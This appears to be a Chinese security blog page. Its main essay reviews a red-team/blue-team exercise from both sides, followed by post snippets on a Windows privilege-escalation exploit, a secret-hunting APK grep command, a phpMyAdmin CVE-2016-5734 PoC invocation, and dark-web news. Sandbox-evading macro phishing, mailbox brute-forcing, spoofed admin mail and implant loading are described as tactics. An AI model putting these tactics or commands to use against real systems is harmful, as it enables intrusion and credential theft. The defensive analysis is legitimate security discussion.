对于所有的黑客来说,菜刀肯定是一个传奇,一直是最稳定、最牛逼的webshell管理工具之一,但同时,菜刀也是一个最容易被发现的攻击工具,毕竟流量特征太明显了,而且一旦发现就100%意味着服务器已沦陷,防守方会里面下线进行深入分析。记得当初第一次见到菜刀这工具时的感觉,总结起来就是“厉害”。因为在菜刀之前,我们学习的都是先小马后大马的姿势。而用了菜刀之后,我深刻理解了什么大马小马都无所谓,能执行命令搞定目标的都是好马。然后经过了几年的迭代,中国菜刀在国内安全圈也是经历了各种风风雨雨,各种后门版满天飞。最后鉴于其加密性能较弱,陆续出现了几个替代版本,蚁剑就是很优秀的一个项目。讲真,我开发水平相对较弱,见到蚁剑才发现原来js也可以写出优秀的跨平台客户端应用。可是正式由于其nodejs写的,才导致其跟AWVS一样,存在一个本地nodejs解析的RCE,很可能被防御方反制。再之后给我“厉害”感觉的就是冰蝎了,其双向通信加解密的管理方式,让诸多基于黑名单正则的防御产品厂商直接歇菜。可是很奇怪的时,还是有很多大量攻击方采用菜刀、jspspy之类的原始webshell,结果被防御方轻松发现并清除。   不过说到最后,我有一个疑惑,为什么大家非得用webshell这种方式搞服务器呢?比如存在weblogic反序列化或者Struts2 RCE漏洞时,黑客们写的工具还是一键写入webshell这种。安全发展到今天,防御手段越来越多,各位白帽子是时候改变了。正如我之前说的,不管用什么shell工具,只要能在服务器端执行命令,下面就肯定有更好的解决方案。我一般会使用命令方式加载自己的二进制版远控来操作。现在的二进制远控不像以前还要生成exe用菜刀上传,在命令行下执行,现在基本都可以做到类似mshta或者powershell的一句话直接动态上线,并且基于TCP/UDP协议的命令执行、文件管理。这样的好处:一是稳定,二是完全绕过那些基于黑名单的流量分析设备。类似metasploit的脚本payload反弹的meterpreter,但是msf特征明显,也容易被杀,所以我个人估计后面攻防还是会发展到类似cobalt strike之类的工具对抗上。   c) 水坑&鱼叉   针对水坑或者鱼叉攻击来讲,可以想象到肯定大量的攻击队伍采用这种方法进行攻击,攻击手法多基于邮件进行。现在假想成攻击队伍,我会首先在github上搜索一波,举个例子:https://github.com/search?q="4dogs.cn"+password&type=Code,注意域名要加上双引号进行精准匹配。在翻到一个可登陆的邮箱后,去通信录导出所有联系人方式,进而进行简单的口令爆破;在这些操作还没拿到有用密码的情况下,就可以根据组织结构进行定点攻击了。高级点的用浏览器0day,没有0day的也可以直接发宏病毒,注意要编个理由并且加密发送,防止被沙箱抓样本。   假如没有有用的邮箱账号,也可以用搜索引擎收集邮箱,再根据规则,加载中国姓名top500字典进行组合,总归能抓到一两个用弱口令的。   如果还是什么都没有,也可以使用swaks一类直接伪造成admin发送钓鱼邮件。   对于防御方来讲,最厉害的莫过于直接关停外网邮箱了。次之,可以派人随时查看登录日志,及时发现异地登录爆破情况。对于有钱的甲方,可以通过流量镜像,对附件进行沙箱判定。   d) 内网渗透,还是要了解业务   在突破边界进入内网后,剩下的主要是内网渗透了。内网渗透可以简单分为横向渗透和纵向渗透。内网渗透的实质和关键是信息收集,通过不停的突破系统拿到更多的权限,而更多的权限带来更多的信息,最终在信息和权限的螺旋迭代下,拿到目标的最高权限。   对于有域的环境,一般目标时拿下域控,而在本次攻击中却恰好爆发了一个直接打域控的0day,这就容易多了。但是即使一键拿下域控权限,还是要回到信息收集的本质上,要在海量的终端里筛选出自己的目标数据在哪台机器里,还是需要一些技巧的。   而不管是什么环境,我个人感觉阻碍攻击队伍进行内网渗透的主要原因还是对目标业务的了解程度。比如电力行业的16字方针,很多时候搞到边界系统后,ipconfig一看是10段的,以为进了个大内网,而实际情况是那只是冰山一角而已。纵向突破还有很长很长的路要走。再者,假如对电信行业、金融行业不了解,进到内网肯定也是一脸懵。这也是内网渗透耗费精力的原因。   e) 0day的优劣势   在本次演习中,陆续发现了大量的0day,印象里有七八个,0day具体细节可以参考各大公众号之前的报到。这里只讨论下针对0day的问题。   从0day的内容和数量上来讲,护网结束后我感觉什么系统都有漏洞,并且有一种想去挖几个留着的冲动,奈何工作杂事太多,先搁置一下吧。   对于攻击方来讲,手握0day是指哪打哪的一个有效支撑。从漏洞类型上,基本覆盖web、网络、操作系统等等方面。针对国内的网络安全现状,讲真,我对那些商业应用真的不报任何安全的奢望。对于国企和政府来讲,自有系统大都是外包厂商开发,而这些外包开发者,大部分不懂安全,甚至sql注入是啥都不知道,更别说防御框架漏洞了。所以对于攻击者来讲,去攻击一个客户广泛的厂商,拿到一个0day即可攻下其相关的所有目标,收益非常高。但同时也要明白,现在0day的生存期非常之短。10年前,我们一个0day可以用半年都没被人发现,而在这次演习中,0day的生存期可能只有半个小时,因为防守方发现shell就会溯源,进而预警。不过排除这次防守方7*24小时的有效监控,在真实情况下,0day的生存周期可能不超过一周。所以我认为,当前网络环境中,0day大量存在,但使用非常谨慎。至于防守方怎么防御0day,请看后面的内容。   3. 从防守方考虑   整体来讲,防守方都是从“事前排查”、“事中监控”、“事后溯源”三个方面进行防御的。根据我的观察,国企安全防御能力一般弱于互联网公司;而国企和政府单位的投入普遍高于互联网公司。导致了演习前大量的“人贩子”到处求人驻场的问题,一度炒到每人每天上万元。下面从几个方面分析这次防守方的经验和教训。   a) 防御过度问题   这次演习的意义和重要性,甲方自己应该更明白,这里不再描述。而正是由于防御方的重视,出现了大量的防御过度现象:一是在开始前的大量系统关停,二是对于互联网IP的大量封禁。大量的关停本质上是掩耳盗铃,在护网结束后依旧面临各类外部攻击者的威胁。希望存在这类情况的厂商,还是能从根源上排查漏洞,加固系统,对系统采取必要的防护措施。   针对恶意封禁IP的情况,虽然体现了防守方及时发现攻击的能力,但同时,也影响了正常业务的运行,特别是一封一个B段的情况。各位甲方还是考虑下从根源解决问题。   b) 应急排查   对于事前的应急排查,甲方大都采用临时购买人工渗透服务的方式进行,毫不客气地说,他们买到的一部分是在校大学生,或者培训机构的实习生。即使钱给够了,去的是个渗透大师,也会因为内网漏洞太多,无法完全覆盖。举个例子:假如给我一个系统,我大概需要一上午分析每个端口,每个业务接口的安全性,进而给出一个完整的测试报告。我基本上可以保证我测试过的系统短时间内不会出大问题。但是假如给我一个B段,告诉我3天完成,那我就只能模拟横向内网渗透,masscan先来一些端口,wvs扫描一轮,然后一批一批的去看。这种模式就决定了无法完全覆盖全部业务系统。即使时间够,那对于新增的业务又怎么办?   那针对这种情况该怎么办?我一直给我的客户普及的一个想法:内网漏洞不要指望短时间内购买一次服务就完全解决了。针对漏洞隐患的工作必须常态化开展:一是上资产管控手段,对内网所有的服务器,通过主动扫描、被动流量分析等手段进行搜集,实时监控内网到底开了多少端口,每个端口运行什么服务,应用是什么版本;二是解决遗留问题,对内网既有的框架漏洞、弱口令漏洞,进行专项整治。相信通过本次护网,原来没搞过安全的防守方,在部署安全设备后发现了大量的永恒之蓝、木马受控等遗留问题。建议大家用几周时间集中解决一类问题,循环下去即可解决遗留的全部问题;三是建立新业务上线审查流程,对于新上线的业务系统,必须通过第三方安全测评,只有拿到安全测评报告的才允许上线。   c) 重边界、轻内网的防御策略   这次的防守方普遍是重边界、轻内网防御,造成了一旦边界被破,内网整体垮掉的风险。而这个情况在我入行时就普遍存在。安全发展到今天,实在是说不过去。去年看到了Google提出的0信任网络,感觉是个趋势,一度想转行做0信任网络的布道者,虽然普及还有一段路,但是我还是希望大家可以转变思维,一定不要认为我在内网就是安全的。万一哪天被黑,可能影响的就是国家利益,带来的就是社会动荡。   d) 威胁情报系统的意义   首先,针对这次攻击,各种原有IOC情报基本无效,比如恶意域名库、恶意IP库等,因为攻击方使用的都是新的域名和IP,这也是黑名单做安全的尴尬。但是同时要感谢安全厂商们的威胁情报库,让更多的国企、政府单位认识到了自己内网办公电脑有很多已经被控制。   e) 面对0day攻击的无力感   面对0day攻击,理论上谁都扛不住,但是实际是这样么?仔细想想并非如此,首先,面对0day真正扛不住的是以黑名单为基础的安全设备,包括waf类、态势感知类、IDS类等。而这些安全设备,又确确实实是各大厂商的首选安全监控设备,一旦这些设备没报警,那基本啥都干不了,这也是防守方们7*24小时防守但其实大部分时间无所事事的原因。   首先,对于web 0day的防御,完全可以采用openrasp类防御方法,从根源上防止各类web漏洞攻击。如果有想购买商业版rasp方案的同学,可以勾兑下我哦。   其次,对于网络0day和系统0day,我们可以采用EDR手段进行防御,在终端上装上agent,在agent上采用白名单策略,对于无关的进程启动和危险命令直接报警或阻断。想起来我们四年前做过的一个产品叫麒麟卫士,可以说是国内首款EDR雏形了,可是去卖的时候发现大家对于需要安装agent的做法都耿耿于怀,不敢装。四年过去了,相信后面会有更多的人接受EDR带来的安全改变。   f) 蜜罐   这次演习的一大亮点就是很多防御方采用了蜜罐的方式进行诱捕和攻击引流。要说蜜罐做得好,那是真的很有用。我理想中的蜜罐应当是完全仿真,而不是动态针对部分服务的仿真。同时可以具备反制的功能,一是可溯源攻击者真实身份,二是可利用AWVS或者蚁剑这类黑客工具自己的漏洞反向攻击攻击者。相信后面会有大量的优秀产品脱颖而出。不过防守方真的真实部署后,可能半年也捕获不到一次有效攻击,毕竟这次是演习,平时黑客攻击还是少。不过安全就是如此,防患于未然。   写在最后:   我个人来讲是一个安全技术爱好者,从攻击到防御,都有涉猎。自从创业以来,干的事情更杂了,但是我一有时间还是在刷安全圈的技术文章,写一些poc。我是一个CEO、一个销售、一个售前、一个产品经理,同时,我也是一个“黑客”,期待着用我的所学所知,能为安全圈带来一些改变。“不忘初心,牢记使命”,与君共勉。 ...

    2020-06-19 26352
  • Windows全版本本地提权

    Windows全版本本地提权EXP(CVE-2020-0787) https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases 一条命令从APK中获取信息 grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/br ...

    2020-06-19 988
  • 一文看懂明网、深网、暗网的区别及暗网的危害

    比特币技术公司Bitfury的研究报告显示,暗网比特币交易总价值在最近一年里增长了65%,在三年里内增长了340%。有些新人可能会有疑问,暗网到底什么? 其实,我们整个互联网可以划分为三个类别,分别是明网、深网以及暗网。今天,我们就简单介绍下它们的区别。 请先看下图:明网(Surface Web),是指能被普通搜索引擎检索到的网络,约占整个互联网的 4%。举个例子,网站内容可以用普通搜索引擎(比如 Google、百度、搜狗)检索到的网站,比如新华网、微博、知乎等,被称为明网。我们的大部分上网时间,都是停留在明网上。 与明网相对的,被称为深网(Deep Web),是指内容不能被普通搜索引擎检索到的网络,约占整个互联网的 96%。深网里面的内容,需要账号密码、访问权限等才可以访问。比如说,我们邮箱里的内容,存储在云服务里面的内容,公司的数据库,学术论文数据库等等,都属于深网的范畴。我们的一部分上网时间,停留在深网上。 在深网这个大范畴下,还有一部分网络被称为暗网(Dark Web),需要通过特定的浏览器、特殊授权或者特殊设置才能链接上的网络,普通的浏览器和搜索引擎无法进入。 暗网的一个特点是经过加密后隐秘性强,不容易追踪到真实的地理位置和使用者的身份。这也导致了暗网上充斥着许多非法交易,比如贩卖Jun Huo、Du pin、身份护照信息等等。 早期,比特币因为匿名性强且小众,主要的交易量和使用场景在暗网里。臭名昭著的“丝绸之路”,就曾经是暗网上的一个专门贩卖Du pin、药物等违禁品的网站,流量非常大,被称为是暗网里的亚马逊网站。经过多年的侦查之后,“丝绸之路”于2013年被美国 FBI 关闭。因为“丝绸之路”,自由主义信仰者成为黑暗帝国的主宰,FBI 明星探员沦为金钱的奴隶,初出茅庐的警员成为真相最后的守护者,相关的故事可以查看白话区块链之前的推文《比特币迷局》。 简单总结一下,整个互联网可以分为明网和深网,区别在于内容能否被普通的搜索引擎检索到,其中占了 96% 份额的深网中还有一小部分被称为暗网,需要特定的浏览器、特殊授权或是特殊设置才能访问,隐秘性强且大部分都是非法的内容。QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-06-18 633
  • 暗网“爆品”报告:欺诈指南占半数

    根据Terbium Labs最新发布的暗网调查数据,欺诈指南占暗网销售数据的近一半(49%),其次是个人数据,占15.6%。 研究人员调查了三个主要的暗网市场:“The Canadian HeadQuarters”、“Empire Market”和“White House Market”,将所有在售数据列表分为六类:个人数据、支付卡、财务账户和凭证、非财务账户和凭证、欺诈指南以及欺诈工具和模板。 暗网市场效仿大型零售商 近年来,网络犯罪分子效仿大型零售商如亚马逊和eBay,逐渐改变了暗网市场的运营结构,例如提供搜索功能、电子商务和卖家评级等服务。 由于出售廉价的个人和财务数据以及提供“欺诈指南”这样的操作指导,上述三个暗网市场销售的数据对于企业来说尤其危险,因为网络犯罪分子可以轻松地进行攻击。 根据调查结果,欺诈指南是最常出售的数据类别(49%),其次是个人数据(15.6%)、非财务账户和凭证(12.2%)、财务账户和凭据(8.2%)、欺诈工具和模板(8%)和支付卡(7%)。 欺诈指南危害被低估 在暗网上,单个欺诈指南的平均成本仅为3.88美元,而在单个列表下出售的一组指南的成本为12.99美元。 企业经常忽视欺诈指南的负面影响,从而给企业带来更大的数字风险,例如网络钓鱼、企业电子邮件泄露、账户接管、凭证收集和欺诈。 欺诈指南中的泛滥使得大多数网络犯罪新手也能将商品数据转化为金融犯罪,对个人和组织造成损害。 个人信息只值一美元 除了欺诈指南外,暗网市场上最“畅销”的是个人数据。这些数据使企业很容易遭受网络钓鱼攻击,企业电子邮件泄露以及账户接管,从而使犯罪分子能够更准确地锁定个人并冒充受害者。 个人记录的平均价格为8.45美元,但有时候“单价”可低至1.00美元。与被盗数据对企业造成的损失相比,个人信息在暗网上的价格低得惊人。 报告指出,犯罪分子购买数据后还需要相关知识和工具来利用这些数据,企业应当尽早检测并响应被盗数据(在处于“原始材料”阶段),这样可以大大减少潜在损失。QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-06-18 549
  • HW有迹象要推迟

    红队已经暂停了,防守队如果没有攻击队,防守什么呢? 最近北京疫情反复,升到二级,出差都出问题。跟圈内一些大佬交流,有可能日期有更改。 纯小道消息,官方为主 ...

    2020-06-18 589
  • 昨日美国被黑客攻击,全国网络几乎瘫痪!

    中国日报消息:美国电信网络遭遇DDOS攻击 全国网络几乎瘫痪!网络 电话 短信均已无法正常使用。至发稿时,还没有黑客组织声称对这个事件负责。这也不是第一次出现大规则的ddos攻击,美国断网的事件。 2016全球首次大规模物联网攻击,导致美国东海岸大面积断网,严重影响当地人民生活秩序和社会稳定,这是由三位大学生所编写的Mirai源代码及运营僵尸网络,造成严重后果,其中在2016年10月,险些搞砸美国大选!当时Mirai大规模爆发,黑客发起对美国互联网域名解析服务商DYN的DDoS攻击,攻击当天,美国东海岸大面积断网,导致Twitter、亚马逊、华尔街日报等数百个重要网站无法访问,美国主要公共服务、社交平台、民众网络服务瘫痪。这次灾难,仅DYN一家公司的直接损失就超过了1.1亿美元,事件的整体损失不可估量。 美国大规模“断网”暴露两个问题 网络攻击归因技术尚未突破 网络攻击归因技术,即通过对网络攻击路径的反向溯源,找到网络攻击发起者的技术。由于网络攻击的隐秘性和手段的多样性,攻击方可利用所控制的第三方、第四方设备展开攻击,被攻击者找到隐蔽攻击者(即归因判断)目前仍然存在技术上的重大障碍。对于此次多达三个波次、断续攻击接近6个小时、数千万个IP地址一同发动的普通的“分布式拒绝服务攻击”,美国官方包括奥巴马总统都坦率承认“我们不知道是谁做的”。这说明美国在网络攻击归因技术上尚未取得根本性突破,其发展严重滞后于攻击技术的发展。 “低技术战术”难以防范 科索沃战争中,号称“不可击落”的美军F-117A隐形轰炸机在贝尔格莱德上空折戟沉沙,原因就在于可以在高技术毫米波雷达上隐形遁迹的“夜鹰”,在南联盟低技术米波雷达上原形毕露,使得北约和美国的战略轰炸效果大打折扣,这是一次典型“低技术战术”的成功案例。 此次对美国进行的大规模网络攻击,攻击者采用的就是普通的“分布式拒绝服务攻击”。这一攻击技术非常“原始”,技术含量很低。发动这种攻击的要点,是必须形成由攻击者控制的庞大的“僵尸网络”,经过精心策划且执行良好,数千万个IP地址同一时间发动攻击。美国在网络防御的高技术研发上不遗余力,而事实证明,在防人力密集型的“低技术”攻击方面,反而是其弱点。 美国只要有黑客攻击,引发的问题,就会甩锅,排名第一,中国,第二是俄罗斯。华盟君觉得吧,这事件有可能是美国黑客干,美国的黑人团体也有大量高技术的黑客,由于美国种族事件高起,引发一些高技术人员不满意。就像能让美国如此大面积故障的,也只有他们自己内部,中国现在技术可能还达不到。 ...

    2020-06-17 669
  • phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞

    phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,`preg_replace`的第一个参数可以利用进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 以下版本受到影响: - 4.0.10.16之前4.0.x版本 - 4.4.15.7之前4.4.x版本 - 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5 ,所以无法复现本漏洞) 启动后,访问`http://192.168.28.4:8080`,即可看到phpMyAdmin的登录页面,账户:root,密码:root。 phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(C POC如下 phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734) phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734) phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734) 运行POC: python C:UserslenovoDesktopa.py -u root -p "root" http://192.168.28.4:8080 -c "system('id')" ...

    2020-06-13 765
  • 为孩子小升初,黑客家长将教委给...

    早些年,都这样的新闻,《黑客改成绩一科收300 入侵多所高校教务系统被捕,》《男子高考成绩不好,怒花千元找黑客改分》昨天在群里看到下面几张图片,网传消息有可能不实 想不到吧,黑客都长大了,中国早期黑客很多都为人父母,华盟的狗哥,黑鹰的大米,黑基的龙哥,季昕华,圈子社区的国士无双,等等...还有已经快做上爷爷的,有些刚结婚,1937cn的宰相,90后的雷锋,孩子马上都要出生了。现在网络安全圈主力是00后,90后在抖音都是叔叔,阿姨了。这真是光阴似箭,时长如梭,我家孩子6岁开始学Python,12岁自己在写小游戏,下面我们将打出这个牌子。 犀利黑客,会注入,会上传,会Xss,会破解,会嗅探,会开发,会业务,会运维,渗透,社工,调戏客服MM,无不精通,祖传三代黑客。电话通知后10秒钟上线,身体强壮可持续渗透7天7夜,上千万肉鸡Ddos流量永不停歇,上至百度、谷歌、NASA、下至刷struts2,刷dedecms,会DDOS一秒钟死一个站。泡面,矿泉水已准备好,家人不支持黑客已经断绝关系,女票不支持黑客已经分手,亲妹不支持黑客已经送人。备用电源,千兆光纤,无线网卡,永不断网,备用电脑一台,发电机二台(含柴油100升)。本人身体强壮,健步如飞,可连续编程20小时不休息,讨论技术方案5小时不喝水,上至带项目、出方案,下至盗号威胁pm,什么都能干。本人意识猥琐,技艺娴熟,0day丰富,能上各种渗透工具,怕延迟可直接接受电话指挥,语音指挥。全面漏洞认识深刻,熟练掌握各种渗透理论,认真学习过《白帽子讲web安全》《Metasploit渗透测试指南》《Web之困》《游戏外挂攻防艺术》等专业书籍。深山苦练30年,一天只睡4小时,脾气好,不喷人,操作虎,意识强,渗透快,shell多,能过狗,能过盾,听指挥,千里之外取服务器首级,瞬息之间爆管理员菊花,日站如杀鸡,压安全狗如压草芥,第一时间赶到众测现场,堵抢快,让漏洞,断后路。我曾经号称至尊大黑客,手握各种0day,社工裤上亿T,高质量shell上亿万,令无数黑客闻风丧胆! 这是朋友圈大家对,黑客渗透教委事件,网友发表看法。 ...

    2020-06-11 697

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:9:00-23:00,节假日休息

扫码关注